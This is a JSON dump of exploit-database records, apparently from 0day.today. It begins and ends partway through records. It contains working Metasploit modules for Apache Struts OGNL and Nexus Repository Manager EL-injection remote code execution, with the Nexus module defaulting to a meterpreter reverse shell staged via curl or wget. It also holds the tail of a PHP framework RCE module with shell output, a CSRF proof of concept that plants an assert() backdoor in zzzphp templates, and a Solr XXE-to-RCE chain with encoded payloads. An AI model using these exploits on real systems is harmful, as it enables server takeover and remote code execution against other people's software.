curl/7.54.0\n > Accept: */*\n > Content-Length: 72\n > Content-Type: application/x-www-form-urlencoded\n >\n } [72 bytes data]\n * upload completely sent off: 72 out of 72 bytes\n < HTTP/1.1 200 OK\n < Date: Mon, 13 Apr 2020 06:44:05 GMT\n < Server: Apache/2.4.25 (Debian)\n < X-Powered-By: PHP/7.2.12\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: text/html; charset=UTF-8\n <\n { [60 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\n wvu@kharak:~$\n=end\n def exploit_5_0_23(cmd)\n # XXX: The server may block on executing our payload and won't respond\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {'s' => 'captcha'},\n 'vars_post' => {\n '_method' => '__construct',\n 'filter[]' => 'system', # TODO: Debug ARCH_PHP\n 'method' => 'get',\n 'server[REQUEST_METHOD]' => cmd\n },\n 'partial' => true\n }, datastore['CmdOutputTimeout'])\n\n return unless res && res.code == 200\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n\n return unless datastore['PAYLOAD'] == 'cmd/unix/generic'\n\n # Clean up output from cmd/unix/generic\n vprint_line(res.body.gsub(/\\n<!DOCTYPE html>.*/m, ''))\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34238", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-14T13:53:08", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret parameter values as OGNL expressions during certain exception handling for mismatched data types of properties which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "cvss3": {}, "published": "2013-03-22T00:00:00", "type": "zdt", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2013-03-22T00:00:00", "id": "1337DAY-ID-20544", "href": "https://0day.today/exploit/description/20544", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\r\n for the use of parentheses which in turn allows it to interpret parameter values as\r\n OGNL expressions during certain exception handling for mismatched data types of\r\n properties which allows remote attackers to execute arbitrary Java code via a\r\n crafted parameter.\r\n },\r\n 'Author' =>\r\n [\r\n 'Meder Kydyraliev', # Vulnerability Discovery and PoC\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module\r\n 'mihi' #ARCH_JAVA support\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-3923'],\r\n [ 'OSVDB', '78501'],\r\n [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'windows'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Oct 01 2011',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',\"username\"]),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', \"/blank-struts2/login.action?INJECT\"]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject = \"PARAMETERTOKEN=(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\"\r\n inject << \"=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true\"\r\n inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))\r\n inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))\r\n uri = String.new(datastore['TARGETURI'])\r\n uri = normalize_uri(uri)\r\n uri.gsub!(/INJECT/,inject) # append the injection string\r\n resp = send_request_cgi({\r\n 'uri' => uri,\r\n 'version' => '1.1',\r\n 'method' => 'GET',\r\n })\r\n return resp #Used for check function.\r\n end\r\n\r\n def exploit\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = 'false'\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@[email\u00a0protected]().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n #Now with all the arch specific stuff set, perform the upload.\r\n #109 = length of command string plus the max length of append.\r\n sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length\r\n chunk_length = 2048 - sub_from_chunk\r\n chunk_length = ((chunk_length/4).floor)*3\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"\"\r\n cmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@[email\u00a0protected](#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/20544", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-06T00:18:44", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2019-03-04T00:00:00", "type": "zdt", "title": "zzzphp CMS 1.6.1 - Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-9082"], "modified": "2019-03-04T00:00:00", "id": "1337DAY-ID-32303", "href": "https://0day.today/exploit/description/32303", "sourceData": "# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1\r\n# Google Dork: intext:\"2015-2019 zzcms.com\"\r\n\r\n# Date: 26/02/2019\r\n\r\n# Exploit Author: Yang Chenglong\r\n\r\n# Vendor Homepage: http://www.zzzcms.com/index.html\r\n\r\n# Software Link: http://115.29.55.18/zzzphp.zip\r\n\r\n# Version: 1.6.1\r\n\r\n# Tested on: windows/Linux,iis/apache\r\n\r\n# CVE : CVE-2019-9082\r\n\r\nDue to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.\r\n\r\nExploit:\r\n\r\n\r\n<html>\r\n\r\n\r\n\r\n <!-- CSRF PoC - generated by Burp Suite Professional -->\r\n\r\n\r\n\r\n <body>\r\n\r\n\r\n\r\n <script>history.pushState('', '', '/')</script>\r\n\r\n\r\n\r\n <form action=\"http://192.168.1.64/zzzphp/admin015/save.php?act=editfile\" method=\"POST\">\r\n\r\n\r\n\r\n <input type=\"hidden\" name=\"file\" value=\"/zzzphp/template/pc/cn2016/html/search.html\" />\r\n\r\n\r\n\r\n <input type=\"hidden\" name=\"filetext\" value=\"{if:assert($_POST[x])}phpinfo();{end if}\" />\r\n\r\n\r\n\r\n <input type=\"submit\" value=\"Submit request\" />\r\n\r\n\r\n\r\n </form>\r\n\r\n\r\n\r\n <script>\r\n\r\n\r\n\r\n document.forms[0].submit();\r\n\r\n\r\n\r\n </script>\r\n\r\n\r\n\r\n </body>\r\n\r\n\r\n\r\n</html>\r\n\r\nSave the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.\r\n\r\nRemarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454\n\n# 0day.today [2019-03-05] #", "sourceHref": "https://0day.today/exploit/32303", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-08-02T09:23:00", "description": "This Metasploit module exploits a Java Expression Language (EL) injection in Nexus Repository Manager versions up to and including 3.21.1 to execute code as the Nexus user. Tested against 3.21.1-01.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-16T00:00:00", "type": "zdt", "title": "Nexus Repository Manager 3.21.1-01 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10199"], "modified": "2020-04-16T00:00:00", "id": "1337DAY-ID-34251", "href": "https://0day.today/exploit/description/34251", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nexus Repository Manager Java EL Injection RCE',\n 'Description' => %q{\n This module exploits a Java Expression Language (EL) injection in Nexus\n Repository Manager versions up to and including 3.21.1 to execute code\n as the Nexus user. Tested against 3.21.1-01.\n },\n 'Author' => [\n 'Alvaro Mu\u00f1oz', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10199'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],\n ['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']\n ],\n 'DisclosureDate' => '2020-03-31', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},\n 'CmdStagerFlavor' => %i[curl wget],\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n Opt::RPORT(8081),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'Nexus username', 'admin']),\n OptString.new('PASSWORD', [true, 'Nexus password', 'admin'])\n ])\n end\n\n def post_auth?\n # Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967\n true\n end\n\n # Send a GET / request to the server, check the response for a Server header\n # containing the Nexus version, and then check if it's a vulnerable version\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check request.')\n end\n\n unless res.headers['Server']\n return CheckCode::Unknown('Target did not respond with Server header.')\n end\n\n # Example Server header:\n # Server: Nexus/3.21.1-01 (OSS)\n version = res.headers['Server'].scan(%r{^Nexus/([\\d.-]+)}).flatten.first\n\n unless version\n return CheckCode::Unknown('Target did not respond with Nexus version.')\n end\n\n if Gem::Version.new(version) <= Gem::Version.new('3.21.1')\n return CheckCode::Appears(\"Nexus #{version} is a vulnerable version.\")\n end\n\n CheckCode::Safe(\"Nexus #{version} is NOT a vulnerable version.\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing command stager for #{datastore['PAYLOAD']}\")\n\n # This will drop a binary payload to disk and execute it!\n execute_cmdstager(\n noconcat: true,\n cookie: login(datastore['USERNAME'], datastore['PASSWORD'])\n )\n end\n\n def login(username, password)\n print_status(\"Logging in with #{username}:#{password}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/service/rapture/session'),\n 'vars_post' => {\n 'username' => Rex::Text.encode_base64(username),\n 'password' => Rex::Text.encode_base64(password)\n },\n 'partial' => true # XXX: Return partial response despite timeout\n }, 3.5)\n\n unless res\n fail_with(Failure::Unknown, 'Target did not respond to login request')\n end\n\n cookie = res.get_cookies\n\n unless res.code == 204 && cookie.match(/NXSESSIONID=[\\h-]+/)\n fail_with(Failure::NoAccess, 'Could not log in with specified creds')\n end\n\n print_good(\"Logged in with #{cookie}\")\n cookie\n end\n\n # This is defined so that CmdStager can use it!\n def execute_command(cmd, opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/service/rest/beta/repositories/go/group'),\n # HACK: Bypass CSRF token with random User-Agent header\n 'agent' => rand_text_english(8..42),\n 'cookie' => opts[:cookie],\n 'ctype' => 'application/json',\n 'data' => json_payload(cmd)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Target did not respond to payload request')\n end\n\n unless res.code == 400 && res.body.match(/java\\.lang\\.UNIXProcess@\\h+/)\n fail_with(Failure::PayloadFailed, \"Could not execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n # PoC based off API docs for /service/rest/beta/repositories/go/group:\n # http://localhost:8081/#admin/system/api\n def json_payload(cmd)\n {\n 'name' => 'internal',\n 'online' => true,\n 'storage' => {\n 'blobStoreName' => 'default',\n 'strictContentTypeValidation' => true\n },\n 'group' => {\n # XXX: memberNames has to be an array, but the API example was a string\n 'memberNames' => [el_payload(cmd)]\n }\n }.to_json\n end\n\n # Helpful resource from which I borrowed the EL payload:\n # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf\n def el_payload(cmd)\n # HACK: Format our EL expression nicely and then strip introduced whitespace\n el = <<~EOF.gsub(/\\s+/, '')\n ${\n \"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\n \"\".getClass().forName(\"java.lang.Runtime\")\n ).exec(\"PATCH_ME\")\n }\n EOF\n\n # Patch in our command, escaping any double quotes\n el.sub('PATCH_ME', cmd.gsub('\"', '\\\\\"'))\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34251", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T07:13:45", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "zdt", "title": "Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2017-10-18T00:00:00", "id": "1337DAY-ID-28814", "href": "https://0day.today/exploit/description/28814", "sourceData": "First Vulnerability: XML External Entity Expansion (deftype=xmlparser) \r\n \r\nLucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports \"xml\" query parser in the search query.\r\n \r\nThe problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://):\r\n \r\nExample usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://xxx.s.artsploit.com/xxx\"'><a></a>'}\r\n \r\nWhen Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition. \r\n \r\nConsidering that we can define parser type in the search query, which is very often comes from untrusted user input, e.g. search fields on websites. It allows to an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.\r\n \r\nFor example, this vulnerability could be user to send malicious data to the '/upload' handler:\r\n \r\nhttp://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={\"xx\":\"yy\"}&commit=true\"'><a></a>'}\r\n \r\nThis vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read arbitrary local files from the solrserver.\r\n \r\nVulnerable code location:\r\n/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java\r\n \r\nstatic Document parseXML(InputStream pXmlFile) throws ParserException {\r\n DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\r\n DocumentBuilder db = null;\r\n try {\r\n db = dbf.newDocumentBuilder();\r\n }\r\n catch (Exception se) {\r\n throw new ParserException(\"XML Parser configuration error\", se);\r\n }\r\n org.w3c.dom.Document doc = null;\r\n try {\r\n doc = db.parse(pXmlFile);\r\n }\r\n \r\n \r\nSteps to reproduce:\r\n \r\n1. Set up a listener on any port by using netcat command \"nc -lv 4444\"\r\n2. Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:4444/executed\"><a></a>'}\r\n3. You will see a request from the Solr server on your netcat listener. It proves that the DOCTYPE declaration is resolved.\r\n \r\n \r\nRemediation suggestions:\r\n \r\nConsider adding the following lines to /solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:\r\n \r\nstatic Document parseXML(InputStream pXmlFile) throws ParserException {\r\n DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\r\n DocumentBuilder db = null;\r\n try {\r\n //protect from XXE attacks\r\n dbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\r\n dbf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\r\n dbf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\r\n \r\n db = dbf.newDocumentBuilder();\r\n }\r\n catch (Exception se) {\r\n throw new ParserException(\"XML Parser configuration error\", se);\r\n }\r\n org.w3c.dom.Document doc = null;\r\n try {\r\n doc = db.parse(pXmlFile);\r\n }\r\n \r\nLinks:\r\nhttps://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing\r\nhttps://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet\r\n \r\nCVSS v2 base score: 9.0\r\n(AV:N/AC:L/Au:N/C:C/I:P/A:P)\r\n \r\nSecond Vulnerability: Remote Code Execution (add-listener: RunExecutableListener)\r\n \r\nSolr \"RunExecutableListener\" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API with add-listener command.\r\n \r\nPOST /solr/newcollection/config HTTP/1.1\r\nHost: localhost:8983\r\nConnection: close\r\nContent-Type: application/json \r\nContent-Length: 198\r\n \r\n{\r\n \"add-listener\" : {\r\n \"event\":\"postCommit\",\r\n \"name\":\"newlistener\",\r\n \"class\":\"solr.RunExecutableListener\",\r\n \"exe\":\"ANYCOMMAND\",\r\n \"dir\":\"/usr/bin/\",\r\n \"args\":[\"ANYARGS\"]\r\n }\r\n}\r\n \r\nParameters \"exe\", \"args\" and \"dir\" can be crafted throught the HTTP request during modification of the collection's config. This means that anybody who can send a HTTP request to Solr API is able to execute arbitrary shell commands when \"postCommit\" event is fired. It leads to execution of arbitrary remote code for a remote attacker.\r\n \r\nSteps to reproduce:\r\n \r\nStep 1. Create a new collection:\r\n \r\nhttp://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2\r\n \r\nStep 2. Set up a listener on any port by using netcat command \"nc -lv 4444\"\r\n \r\nStep 3. Add a new RunExecutableListener listener for the collection where \"exe\" attribute contents the name of running command (\"/usr/bin/curl\") and \"args\" attribute contents \"http://localhost:4444/executed\" value to make a request to the attacker's netcat listener:\r\n \r\nPOST /solr/newcollection/config HTTP/1.1\r\nHost: localhost:8983\r\nConnection: close\r\nContent-Type: application/json \r\nContent-Length: 198\r\n \r\n{\r\n \"add-listener\" : {\r\n \"event\":\"postCommit\",\r\n \"name\":\"newlistener\",\r\n \"class\":\"solr.RunExecutableListener\",\r\n \"exe\":\"curl\",\r\n \"dir\":\"/usr/bin/\",\r\n \"args\":[\"http://localhost:4444/executed\"]\r\n }\r\n}\r\n \r\nStep 4. Update \"newcollection\" to trigger execution of RunExecutableListener: \r\n \r\nPOST /solr/newcollection/update HTTP/1.1\r\nHost: localhost:8983\r\nConnection: close\r\nContent-Type: application/json \r\nContent-Length: 19\r\n \r\n[{\"id\":\"test\"}]\r\n \r\nStep 5. You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.\r\n \r\n \r\nCVSS v2 base score: 10.0\r\n(AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n \r\nSummary:\r\n \r\nBy chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker should be able to specify a part of query that comes to \"q\"\r\nsearch parameter (which is a case for many web applications who use solr).\r\n \r\nLets say that we have an attacker who can only send search queries (\"q\" param) to a \"/select\" solr endpoint.\r\nHere is the complete exploit scenario:\r\n \r\nStep 1. Create New collection via XXE. This step may be skipped if the attacker already knows any collection name.\r\n \r\nhttp://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20\r\n \r\nWithout URL encode:\r\n \r\nhttp://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2\"><a></a>'}\r\n \r\nStep 2. Set up a netcat listener \"nc -lv 4444\"\r\n \r\nStep 3. Add a new RunExecutableListener listener via XXE\r\n \r\nhttp://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%